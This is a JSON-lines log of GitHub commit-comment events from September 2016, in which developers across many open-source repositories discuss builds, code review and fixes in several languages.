{"id":"4518410544","type":"CommitCommentEvent","actor":{"login":"aignatius3"},"repo":{"name":"GT-CS2340-TheGoGitters/M2"},"payload":{"comment":{"id":18903901,"position":null,"line":null,"path":null,"commit_id":"7f810e04d41a1e142874f971466fef8779a21f10","created_at":"2016-09-05T21:43:44Z","updated_at":"2016-09-05T21:43:44Z","body":"I entered my name and GTID where the javadocs instructed me to. I had to play around with the libraries to get the code to compile. That is why there are multiple files edited. AntLamMain,java is the only file where I went in and manually changed the text."}},"created_at":"2016-09-05T21:43:44Z"}
{"id":"4518411707","type":"CommitCommentEvent","actor":{"login":"robertcporter"},"repo":{"name":"robertcporter/hello-world"},"payload":{"comment":{"id":18903904,"position":null,"line":null,"path":null,"commit_id":"b9d6148686e677767a7aa8cfd05963c8d789f20d","created_at":"2016-09-05T21:44:24Z","updated_at":"2016-09-05T21:44:24Z","body":"I've designed and implemented many changes in our current processes but know there are many more changes possible.  i'm looking forward to furthering the process"}},"created_at":"2016-09-05T21:44:24Z"}
{"id":"4518412187","type":"CommitCommentEvent","actor":{"login":"nik-tar"},"repo":{"name":"nik-tar/laba1"},"payload":{"comment":{"id":18903906,"position":5,"line":64,"path":"src/demo/parallel/Complex.java","commit_id":"a81d2b184bda4a9c31bd105e143f57ced4a90e27","created_at":"2016-09-05T21:44:40Z","updated_at":"2016-09-05T21:44:40Z","body":"I'll replace this one to correct variant."}},"created_at":"2016-09-05T21:44:40Z"}
{"id":"4518412190","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18903907,"position":16,"line":16,"path":"src/Jwt.js","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-05T21:44:40Z","updated_at":"2016-09-05T21:44:40Z","body":"@tjlytle based on [the spec](https://github.com/Nexmo/client-library-specification/pull/14/files#diff-c53f356c44b1690751ca3252fa65861fR67) I need to add `exp` and `nbf`.\r\n\r\nA couple of questions:\r\n\r\n1. What format should `exp` and `nbf` be in?\r\n2. Should the method also allow the `iat` and `jti` to be set by the developer? I want to set them for testing, but just wondering if they should be in the spec too?\r\n\r\n"}},"created_at":"2016-09-05T21:44:40Z"}
{"id":"4518413529","type":"CommitCommentEvent","actor":{"login":"treepalx90"},"repo":{"name":"KarlTDebiec/MolDynPlot"},"payload":{"comment":{"id":18903909,"position":null,"line":null,"path":null,"commit_id":"e64d93722c4acae4c5cca41ed5abe27a32fa5f78","created_at":"2016-09-05T21:45:23Z","updated_at":"2016-09-05T21:45:23Z","body":"Cum on man  . just do it"}},"created_at":"2016-09-05T21:45:23Z"}
{"id":"4518415411","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18903911,"position":141,"line":139,"path":"app/build.gradle","commit_id":"dc9db6d917f54d312b9604eeeb54a6cee10d27bf","created_at":"2016-09-05T21:46:25Z","updated_at":"2016-09-05T21:46:25Z","body":"FTR: #370 seems about reverting this change (since it didn't work)."}},"created_at":"2016-09-05T21:46:25Z"}
{"id":"4518415668","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903912,"position":null,"line":null,"path":null,"commit_id":"29e0d0d5de004306bd72667bbf08dd62d4c0b904","created_at":"2016-09-05T21:46:33Z","updated_at":"2016-09-05T21:46:33Z","body":"Submitting the task to TaskCluster failed. Request payload must follow the schema: http://schemas.taskcluster.net/scheduler/v1/task-graph.json#Details:\n\n```js\n{\n    \"validation\": {\n        \"tasks\": {\n            \"schema\": {\n                \"0\": {\n                    \"schema\": {\n                        \"task\": {\n                            \"schema\": {\n                                \"features\": {\n                                    \"additional\": true\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n```"}},"created_at":"2016-09-05T21:46:33Z"}
{"id":"4518417968","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903913,"position":null,"line":null,"path":null,"commit_id":"029f18f2a39041e23a8b3a8fa682dcf641a57d2f","created_at":"2016-09-05T21:47:52Z","updated_at":"2016-09-05T21:47:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZnJr2BxaSCKKGR-we1uWSA"}},"created_at":"2016-09-05T21:47:52Z"}
{"id":"4518420535","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/kvirc-www"},"payload":{"comment":{"id":18903917,"position":null,"line":null,"path":null,"commit_id":"238556aeef4d39af75d248310f7191ba09a1d43c","created_at":"2016-09-05T21:49:12Z","updated_at":"2016-09-05T21:49:12Z","body":"bastard thing doesnt work ;/ ill look into it tomorrow."}},"created_at":"2016-09-05T21:49:12Z"}
{"id":"4518422723","type":"CommitCommentEvent","actor":{"login":"gebner"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18903919,"position":37,"line":37,"path":"pkgs/development/compilers/llvm/3.9/clang/default.nix","commit_id":"15af9082ebeb2aece84e426daf7185715cfbb203","created_at":"2016-09-05T21:50:25Z","updated_at":"2016-09-05T21:50:25Z","body":"I changed it for the release candidate: there the version is 3.9.0rc3, but the directory is still called 3.9.0.  I wanted to change it when updating to the final version, but @vcunat was faster than me."}},"created_at":"2016-09-05T21:50:25Z"}
{"id":"4518423903","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18903921,"position":157,"line":157,"path":"lib/lexer.js","commit_id":"49a11ff16ff2ac88f3da2677e414f070b63898ab","created_at":"2016-09-05T21:51:05Z","updated_at":"2016-09-05T21:51:05Z","body":"yeah the lexer was removed until 0.6.0 https://github.com/jonschlinkert/snapdragon#v050"}},"created_at":"2016-09-05T21:51:05Z"}
{"id":"4518424274","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18903922,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-05T21:51:16Z","updated_at":"2016-09-05T21:51:16Z","body":"By the way as Leonardo says, ﻿with more pawn islands/groups, relative values of pawns decrease, those of bishops, rooks and queen increase, while it should be neutral for knights..."}},"created_at":"2016-09-05T21:51:16Z"}
{"id":"4518424334","type":"CommitCommentEvent","actor":{"login":"funbringer"},"repo":{"name":"postgrespro/pg_pathman"},"payload":{"comment":{"id":18903923,"position":5,"line":555,"path":"src/init.c","commit_id":"d00a9ae250ab38ec73ec071a04eb8ae7eeae401e","created_at":"2016-09-05T21:51:18Z","updated_at":"2016-09-05T21:51:18Z","body":"This fixes pg_dump."}},"created_at":"2016-09-05T21:51:18Z"}
{"id":"4518424492","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18903924,"position":36,"line":71,"path":"app/src/main/java/com/kamron/pogoiv/MainActivity.java","commit_id":"2234723be4f73c2a5b459686169ae5a260871619","created_at":"2016-09-05T21:51:22Z","updated_at":"2016-09-05T21:51:22Z","body":"Fair enough."}},"created_at":"2016-09-05T21:51:22Z"}
{"id":"4518425180","type":"CommitCommentEvent","actor":{"login":"RZachLamberty"},"repo":{"name":"rlp612/MUBS-Webpage"},"payload":{"comment":{"id":18903927,"position":null,"line":null,"path":null,"commit_id":"5cd9537f94d59059158775c9dce571858089cd77","created_at":"2016-09-05T21:51:46Z","updated_at":"2016-09-05T21:51:46Z","body":"#1 tables added. Once I have more background on what is required for the four middle columns in this table I'll create a new issue and work that as needed; for now the information is all being displayed as best as I could understand it"}},"created_at":"2016-09-05T21:51:46Z"}
{"id":"4518425938","type":"CommitCommentEvent","actor":{"login":"thanneken"},"repo":{"name":"thanneken/SpectralRTI_Toolkit"},"payload":{"comment":{"id":18903929,"position":21,"line":21,"path":"README.md","commit_id":"1e8751d56cbc37701e8f3d66c628b1f33452c61c","created_at":"2016-09-05T21:52:13Z","updated_at":"2016-09-05T21:52:13Z","body":"* Minimize external dependencies "}},"created_at":"2016-09-05T21:52:13Z"}
{"id":"4518430458","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18903938,"position":157,"line":157,"path":"lib/lexer.js","commit_id":"49a11ff16ff2ac88f3da2677e414f070b63898ab","created_at":"2016-09-05T21:54:55Z","updated_at":"2016-09-05T21:54:55Z","body":"yeah, seen that `simplify` commit removed it."}},"created_at":"2016-09-05T21:54:55Z"}
{"id":"4518431942","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18903939,"position":215,"line":3419,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-05T21:55:48Z","updated_at":"2016-09-05T21:55:48Z","body":"Bei der wh1080 ist der CRC bekannt. Meiner Meinung nach macht es bei der wh1080 keinen Sinn den CRC Check  abzuschalten.\r\n"}},"created_at":"2016-09-05T21:55:48Z"}
{"id":"4518432443","type":"CommitCommentEvent","actor":{"login":"Luchillo"},"repo":{"name":"pluralsight/guides"},"payload":{"comment":{"id":18903941,"position":null,"line":null,"path":null,"commit_id":"fa50572ad111758a7c7988a4bc552c88735a5ee0","created_at":"2016-09-05T21:56:09Z","updated_at":"2016-09-05T21:56:09Z","body":"Damn, i really need to learn to write proper english.\r\n\r\nThanks, it's a lot more readable now :)."}},"created_at":"2016-09-05T21:56:09Z"}
{"id":"4518436266","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18903949,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T21:58:25Z","updated_at":"2016-09-05T21:58:25Z","body":"Good luck, too!"}},"created_at":"2016-09-05T21:58:25Z"}
{"id":"4518439691","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18903951,"position":null,"line":null,"path":null,"commit_id":"79dd808ab1da9ea104425702bdf5fb19fb309eea","created_at":"2016-09-05T22:00:17Z","updated_at":"2016-09-05T22:00:17Z","body":"@philipbelesky I guess we've been fluking our way through the last couple of months…\r\n\r\n(It broke here: https://travis-ci.org/czlee/tabbycat/jobs/157569475)"}},"created_at":"2016-09-05T22:00:17Z"}
{"id":"4518440625","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18903954,"position":37,"line":0,"path":"pkgs/development/compilers/llvm/3.9/clang/default.nix","commit_id":"15af9082ebeb2aece84e426daf7185715cfbb203","created_at":"2016-09-05T22:00:40Z","updated_at":"2016-09-05T22:00:40Z","body":"ahh that makes sense. thanks!"}},"created_at":"2016-09-05T22:00:40Z"}
{"id":"4518447573","type":"CommitCommentEvent","actor":{"login":"DaMichel"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":18903960,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-05T22:04:29Z","updated_at":"2016-09-05T22:04:29Z","body":"A shame. It was very very useful. You removed it because of the PS3 Eye? \r\nIf so, I suppose it is a known OpenCV issue. Have you seen this? These guys say they made it work by using the 32 bit version of OpenCV. I don't know enough of Direct X to understand if this makes sense or not ..."}},"created_at":"2016-09-05T22:04:29Z"}
{"id":"4518451537","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18903970,"position":null,"line":null,"path":null,"commit_id":"562fef758dd525e3318719a65412b5992a639457","created_at":"2016-09-05T22:06:47Z","updated_at":"2016-09-05T22:06:47Z","body":"Nope"}},"created_at":"2016-09-05T22:06:47Z"}
{"id":"4518456855","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18903978,"position":null,"line":null,"path":null,"commit_id":"378fd00452183942a6a76a0d7cf19e8f010db3d4","created_at":"2016-09-05T22:09:56Z","updated_at":"2016-09-05T22:09:56Z","body":"👍 "}},"created_at":"2016-09-05T22:09:56Z"}
{"id":"4518459122","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903981,"position":null,"line":null,"path":null,"commit_id":"e4c3326dd1c4a601dfb0aada072e6ea5846150c8","created_at":"2016-09-05T22:11:13Z","updated_at":"2016-09-05T22:11:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#G2LCOK-OQWC6vpplsZY8yQ"}},"created_at":"2016-09-05T22:11:13Z"}
{"id":"4518459154","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18903982,"position":37,"line":37,"path":"pkgs/development/compilers/llvm/3.9/clang/default.nix","commit_id":"15af9082ebeb2aece84e426daf7185715cfbb203","created_at":"2016-09-05T22:11:15Z","updated_at":"2016-09-05T22:11:15Z","body":"I didn't notice such details. It can still be changed, without causing any rebuilds."}},"created_at":"2016-09-05T22:11:15Z"}
{"id":"4518460520","type":"CommitCommentEvent","actor":{"login":"BytewaveMLP"},"repo":{"name":"LordNature/Simplexity"},"payload":{"comment":{"id":18903985,"position":null,"line":null,"path":null,"commit_id":"bc4b65ab04fcea54565ebe24bb2e7c0d31a364b7","created_at":"2016-09-05T22:12:08Z","updated_at":"2016-09-05T22:12:08Z","body":"@LordNature Die"}},"created_at":"2016-09-05T22:12:08Z"}
{"id":"4518462008","type":"CommitCommentEvent","actor":{"login":"rohanthewiz"},"repo":{"name":"rohanthewiz/router"},"payload":{"comment":{"id":18903990,"position":5,"line":187,"path":"context.go","commit_id":"d3af8624f4f1087437fa842d97645afa98e32c33","created_at":"2016-09-05T22:12:58Z","updated_at":"2016-09-05T22:12:58Z","body":"Yep, I wanted to allow larger files here."}},"created_at":"2016-09-05T22:12:58Z"}
{"id":"4518462560","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18903991,"position":null,"line":null,"path":null,"commit_id":"a65b81e363da72989a854abd8b9dbb2171fe0de4","created_at":"2016-09-05T22:13:16Z","updated_at":"2016-09-05T22:13:16Z","body":"Oops, this was for #4406."}},"created_at":"2016-09-05T22:13:16Z"}
{"id":"4518463621","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"sgalkina/raytracer"},"payload":{"comment":{"id":18903995,"position":34,"line":32,"path":"src/main.cpp","commit_id":"daaac9f09675ee0bd78b5b1375a022792a1259ec","created_at":"2016-09-05T22:13:53Z","updated_at":"2016-09-05T22:13:53Z","body":"Ай ай ай, а где же абстракция?\r\n\r\nПочему бы стрим аргументом не передать?"}},"created_at":"2016-09-05T22:13:53Z"}
{"id":"4518464201","type":"CommitCommentEvent","actor":{"login":"marcioAlmada"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18903996,"position":null,"line":null,"path":null,"commit_id":"009ee6e503fd2f354f6eda2b6a74f13344dca3b0","created_at":"2016-09-05T22:14:16Z","updated_at":"2016-09-05T22:14:16Z","body":"watef..."}},"created_at":"2016-09-05T22:14:16Z"}
{"id":"4518465395","type":"CommitCommentEvent","actor":{"login":"Bearfear319"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18903998,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-05T22:14:58Z","updated_at":"2016-09-05T22:14:58Z","body":"Hey I kinda know what I am doing but I am lost on 1 thing.. NODE PROTOBUF how do I install it?  cuz before the protobuf I could use the server but now I cannot"}},"created_at":"2016-09-05T22:14:58Z"}
{"id":"4518465730","type":"CommitCommentEvent","actor":{"login":"rohanthewiz"},"repo":{"name":"rohanthewiz/router"},"payload":{"comment":{"id":18903999,"position":null,"line":null,"path":null,"commit_id":"d3af8624f4f1087437fa842d97645afa98e32c33","created_at":"2016-09-05T22:15:11Z","updated_at":"2016-09-05T22:15:11Z","body":"Some file modes were changed after a local system reload. I should have used tar instead of zip when archiving files so as to preserve permissions."}},"created_at":"2016-09-05T22:15:11Z"}
{"id":"4518466884","type":"CommitCommentEvent","actor":{"login":"TazeTSchnitzel"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18904002,"position":null,"line":null,"path":null,"commit_id":"009ee6e503fd2f354f6eda2b6a74f13344dca3b0","created_at":"2016-09-05T22:15:47Z","updated_at":"2016-09-05T22:15:47Z","body":"Ask @bwoebi."}},"created_at":"2016-09-05T22:15:47Z"}
{"id":"4518467211","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"sgalkina/raytracer"},"payload":{"comment":{"id":18904003,"position":15,"line":48,"path":"src/scene.h","commit_id":"daaac9f09675ee0bd78b5b1375a022792a1259ec","created_at":"2016-09-05T22:15:59Z","updated_at":"2016-09-05T22:15:59Z","body":"Не оч хорошо в одном коммите и консты добавлять, и делать новые фичи. \r\n\r\nесли делаешь новую фичу, и тут пониаешь, что надо порефачить, то лучше сделать `git stash`, отрефакторить, закоммититься и `git stash pop`."}},"created_at":"2016-09-05T22:15:59Z"}
{"id":"4518469289","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18904005,"position":null,"line":null,"path":null,"commit_id":"009ee6e503fd2f354f6eda2b6a74f13344dca3b0","created_at":"2016-09-05T22:17:12Z","updated_at":"2016-09-05T22:17:12Z","body":"No comment."}},"created_at":"2016-09-05T22:17:12Z"}
{"id":"4518469280","type":"CommitCommentEvent","actor":{"login":"WallE256"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":18904006,"position":null,"line":null,"path":null,"commit_id":"35407e4c30f3df22c9ac5d04781fff96be8add5a","created_at":"2016-09-05T22:17:13Z","updated_at":"2016-09-05T22:17:13Z","body":"![](http://alpcentauri.info/at-least-you-tried.jpg)"}},"created_at":"2016-09-05T22:17:13Z"}
{"id":"4518470209","type":"CommitCommentEvent","actor":{"login":"Xyene"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":18904007,"position":null,"line":null,"path":null,"commit_id":"35407e4c30f3df22c9ac5d04781fff96be8add5a","created_at":"2016-09-05T22:17:47Z","updated_at":"2016-09-05T22:17:47Z","body":":sob: "}},"created_at":"2016-09-05T22:17:47Z"}
{"id":"4518470305","type":"CommitCommentEvent","actor":{"login":"bennn"},"repo":{"name":"nuprl/nuprl.github.io"},"payload":{"comment":{"id":18904008,"position":null,"line":null,"path":null,"commit_id":"721015e8cdc0811f0c5cc8b0ab71ae4c907fda86","created_at":"2016-09-05T22:17:51Z","updated_at":"2016-09-05T22:17:51Z","body":"Shouts out to `make sync` 🙌 "}},"created_at":"2016-09-05T22:17:51Z"}
{"id":"4518470380","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18904009,"position":4,"line":40,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/analyzer/LiteralVisitor.java","commit_id":"a65b81e363da72989a854abd8b9dbb2171fe0de4","created_at":"2016-09-05T22:17:54Z","updated_at":"2016-09-05T22:17:54Z","body":"uh oh. @lucaswerkmeister I knew this day was coming, but this won't work with `ceylon.ast`, will it?"}},"created_at":"2016-09-05T22:17:54Z"}
{"id":"4518470667","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18904012,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T22:18:03Z","updated_at":"2016-09-05T22:18:03Z","body":"@vmassol  I agree that `<pre>{@code}` is the best option, and I don't think that having an extra `}` in Eclipse's embedded javadoc viewer is a blocker. @tmortagne is there anything else that you saw broken other than that?"}},"created_at":"2016-09-05T22:18:03Z"}
{"id":"4518472323","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18904016,"position":4,"line":40,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/analyzer/LiteralVisitor.java","commit_id":"a65b81e363da72989a854abd8b9dbb2171fe0de4","created_at":"2016-09-05T22:19:01Z","updated_at":"2016-09-05T22:19:01Z","body":"No, and I’ll have to add hacks in *two* modules to support this. And there’s no way to make that hack in `ceylon.ast.core` only visible to `ceylon.ast.redhat`. Urgh.\r\n\r\nCan you open an issue, please?"}},"created_at":"2016-09-05T22:19:01Z"}
{"id":"4518477371","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18904023,"position":9,"line":15,"path":"src/robske_110/EasyFloatingTextListener.php","commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T22:21:58Z","updated_at":"2016-09-05T22:21:58Z","body":"jk man\r\n"}},"created_at":"2016-09-05T22:21:58Z"}
{"id":"4518478699","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18904025,"position":null,"line":null,"path":null,"commit_id":"fc1fbf91ad718d15c0618ad6d69a60812b5e9506","created_at":"2016-09-05T22:22:45Z","updated_at":"2016-09-05T22:22:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XK5tyy98SOuTcvOPF1zuWg"}},"created_at":"2016-09-05T22:22:45Z"}
{"id":"4518479485","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18904027,"position":1,"line":1,"path":".ruby-version","commit_id":"5441fe485ed164d61ed5fd0c47aad1fb1c43550b","created_at":"2016-09-05T22:23:12Z","updated_at":"2016-09-05T22:23:12Z","body":"Кстати, если используешь RVM, можно указывать версию Ruby прямо в Gemfile, это довольно удобно: https://devcenter.heroku.com/articles/ruby-versions"}},"created_at":"2016-09-05T22:23:12Z"}
{"id":"4518481189","type":"CommitCommentEvent","actor":{"login":"rkotze"},"repo":{"name":"brillout/awesome-react-components"},"payload":{"comment":{"id":18904030,"position":null,"line":null,"path":null,"commit_id":"169482fde1c7f228b4fd0c91f1c8c3168d0c8a93","created_at":"2016-09-05T22:24:11Z","updated_at":"2016-09-05T22:24:11Z","body":"Hi @brillout \r\n\r\nThanks for looking at this.\r\n\r\nI was trying to put it under the [`css / style` section](https://github.com/brillout/awesome-react-components#css--style). It's to help with joining string for example class names."}},"created_at":"2016-09-05T22:24:11Z"}
{"id":"4518482667","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18904031,"position":1,"line":1,"path":"README.rdoc","commit_id":"5441fe485ed164d61ed5fd0c47aad1fb1c43550b","created_at":"2016-09-05T22:25:07Z","updated_at":"2016-09-05T22:25:07Z","body":"Не придираюсь, но неплохо бы заполнить `README` и изменить заодно его расширение на `*.md`."}},"created_at":"2016-09-05T22:25:07Z"}
{"id":"4518484998","type":"CommitCommentEvent","actor":{"login":"annejan"},"repo":{"name":"annejan/eink"},"payload":{"comment":{"id":18904033,"position":null,"line":null,"path":null,"commit_id":"4c2796d81e4d0099e2d3a182c1dd316b559bb4ba","created_at":"2016-09-05T22:26:20Z","updated_at":"2016-09-05T22:26:20Z","body":"Found at https://github.com/jsyk/PIP-Watch/blob/master/epd_driver_basic_stm32f101_sw/src/main.c"}},"created_at":"2016-09-05T22:26:20Z"}
{"id":"4518485597","type":"CommitCommentEvent","actor":{"login":"DCubix"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18904034,"position":null,"line":null,"path":null,"commit_id":"53e7c804711aafb8dd3616e5225f2a43b17c3d11","created_at":"2016-09-05T22:26:41Z","updated_at":"2016-09-05T22:26:41Z","body":"Thank you for this :D"}},"created_at":"2016-09-05T22:26:41Z"}
{"id":"4518486892","type":"CommitCommentEvent","actor":{"login":"IvanMirev"},"repo":{"name":"IvanMirev/Primeri.CSharp.Terminal"},"payload":{"comment":{"id":18904037,"position":27,"line":10,"path":"README.md","commit_id":"ca55c5398be9a1eb4670543a21a29437e6aee1ae","created_at":"2016-09-05T22:27:24Z","updated_at":"2016-09-05T22:27:24Z","body":"Това не трябва да е тук....."}},"created_at":"2016-09-05T22:27:24Z"}
{"id":"4518487854","type":"CommitCommentEvent","actor":{"login":"palewire"},"repo":{"name":"california-civic-data-coalition/django-calaccess-downloads-website"},"payload":{"comment":{"id":18904039,"position":null,"line":null,"path":null,"commit_id":"4bdb27e07740dfa60525ff2f62109b4217c64c55","created_at":"2016-09-05T22:27:56Z","updated_at":"2016-09-05T22:27:56Z","body":"Great. If we still have problems with the underline on the right nav I was thinking we could perhaps switch from a bottom border to text-decoration."}},"created_at":"2016-09-05T22:27:56Z"}
{"id":"4518488123","type":"CommitCommentEvent","actor":{"login":"IvanMirev"},"repo":{"name":"IvanMirev/Primeri.CSharp.Terminal"},"payload":{"comment":{"id":18904041,"position":30,"line":13,"path":"README.md","commit_id":"ca55c5398be9a1eb4670543a21a29437e6aee1ae","created_at":"2016-09-05T22:28:07Z","updated_at":"2016-09-05T22:28:07Z","body":"Този код над коментара в зелен фон не трябва да е тук...."}},"created_at":"2016-09-05T22:28:07Z"}
{"id":"4518488703","type":"CommitCommentEvent","actor":{"login":"IvanMirev"},"repo":{"name":"IvanMirev/Primeri.CSharp.Terminal"},"payload":{"comment":{"id":18904043,"position":47,"line":16,"path":"README.md","commit_id":"ca55c5398be9a1eb4670543a21a29437e6aee1ae","created_at":"2016-09-05T22:28:26Z","updated_at":"2016-09-05T22:28:26Z","body":"Този в зеленото също...."}},"created_at":"2016-09-05T22:28:26Z"}
{"id":"4518490581","type":"CommitCommentEvent","actor":{"login":"IvanMirev"},"repo":{"name":"IvanMirev/Primeri.CSharp.Terminal"},"payload":{"comment":{"id":18904045,"position":1,"line":1,"path":"README.md","commit_id":"ca55c5398be9a1eb4670543a21a29437e6aee1ae","created_at":"2016-09-05T22:29:34Z","updated_at":"2016-09-05T22:29:34Z","body":"Защо всичко е толкова разхвърляно?"}},"created_at":"2016-09-05T22:29:34Z"}
{"id":"4518490759","type":"CommitCommentEvent","actor":{"login":"noname00000123"},"repo":{"name":"noname00000123/annotate_models"},"payload":{"comment":{"id":18904046,"position":null,"line":null,"path":null,"commit_id":"79b0b027de8a628b674174faafe6ccc12e92b604","created_at":"2016-09-05T22:29:42Z","updated_at":"2016-09-05T22:29:42Z","body":"Overrides :annotate_pattern to ensure trailing comments aren't clobbered when\r\nannotation replaced.\r\n\r\nAlternatively\r\n  ```ruby\r\n    def remove_annotation_of_file(file_name, options={})\r\n      if File.exist?(file_name)\r\n        content = File.read(file_name)\r\n        wrapper_open = options[:wrapper_open] ? \"# #{options[:wrapper_open]}\\n\" : \"\"\r\n        wrapper_close = options[:wrapper_close] ? \"# #{options[:wrapper_close]}\\n\" : \"\"\r\n        annotation_start = nil\r\n        annotation_end = nil\r\n        \r\n        content.each_line.with_index(1) do |line, i|\r\n          annotation_start = i if line.include? options[:wrapper_open]\r\n          annotation_end = i if line.include? options[:wrapper_close]\r\n        end\r\n        \r\n        # Regexp includes all lines beginning with \"#\" and breaks at first empty line. Consequently all comments immediately following the annotation will be clobbered. Try breaking regexp on :wrapper_close.\r\n        # content.sub!(/(#{wrapper_open})?#{annotate_pattern(options)}/, '')\r\n    \r\n        # existing.match(/(#\\s@schema\\n)(.*?\\n(#.*\\n)*)(#\\s@!schema)/)\r\n        # existing.split(/#\\s@schema\\n|#\\s@!schema/)\r\n    \r\n        File.open(file_name, 'wb') { |f| f.puts content.lines[annotation_end..-1].join }\r\n    \r\n        true\r\n      else\r\n        false\r\n      end\r\n    end\r\n  ```"}},"created_at":"2016-09-05T22:29:42Z"}
{"id":"4518491967","type":"CommitCommentEvent","actor":{"login":"IvanMirev"},"repo":{"name":"IvanMirev/Primeri.CSharp.Terminal"},"payload":{"comment":{"id":18904047,"position":16,"line":8,"path":"README.md","commit_id":"ca55c5398be9a1eb4670543a21a29437e6aee1ae","created_at":"2016-09-05T22:30:23Z","updated_at":"2016-09-05T22:30:23Z","body":"Този също!                                               "}},"created_at":"2016-09-05T22:30:23Z"}
{"id":"4518492619","type":"CommitCommentEvent","actor":{"login":"Daniel-Griffiths"},"repo":{"name":"Daniel-Griffiths/Vertex"},"payload":{"comment":{"id":18904049,"position":null,"line":null,"path":null,"commit_id":"55593d03931951aff30edd3bc1c9b838d32ad845","created_at":"2016-09-05T22:30:44Z","updated_at":"2016-09-05T22:30:44Z","body":"For some reason this doesn't work unless I wrap true in quotes? Very odd."}},"created_at":"2016-09-05T22:30:44Z"}
{"id":"4518498690","type":"CommitCommentEvent","actor":{"login":"samaellopez"},"repo":{"name":"samaellopez/RestaurantBD"},"payload":{"comment":{"id":18904058,"position":null,"line":null,"path":null,"commit_id":"d28c907668d53b0df40018fa520eaf255919cdeb","created_at":"2016-09-05T22:34:06Z","updated_at":"2016-09-05T22:34:06Z","body":"Inical"}},"created_at":"2016-09-05T22:34:06Z"}
